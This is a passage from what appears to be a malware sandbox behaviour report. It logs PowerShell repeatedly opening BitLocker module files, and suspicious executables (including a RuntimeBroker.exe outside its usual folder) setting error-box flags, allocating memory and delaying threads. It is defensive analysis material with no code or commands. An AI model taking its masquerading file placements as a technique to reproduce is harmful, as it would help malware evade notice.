                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe Memory allocated: 1580000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe Memory allocated: 1AF90000 memory reserve | memory write watch
                          Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe Memory allocated: 1840000 memory reserve | memory write watch
                          Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe Memory allocated: 1B3C0000 memory reserve | memory write watch
                          Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe Memory allocated: B60000 memory reserve | memory write watch
                          Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe Memory allocated: 1A650000 memory reserve | memory write watch
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe Memory allocated: 11E0000 memory reserve | memory write watch
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe Memory allocated: 1B0A0000 memory reserve | memory write watch
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe Memory allocated: 33F0000 memory reserve | memory write watch
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe Memory allocated: 1B3F0000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe Memory allocated: 18C0000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe Memory allocated: 1B430000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe Memory allocated: 970000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe Memory allocated: 1A680000 memory reserve | memory write watch
                          Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe Thread delayed: delay time: 922337203685477 (2 identical entries)
                          Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe Thread delayed: delay time: 922337203685477 (2 identical entries)
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (37 identical entries)
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe Thread delayed: delay time: 922337203685477 (2 identical entries)
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1792
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1120
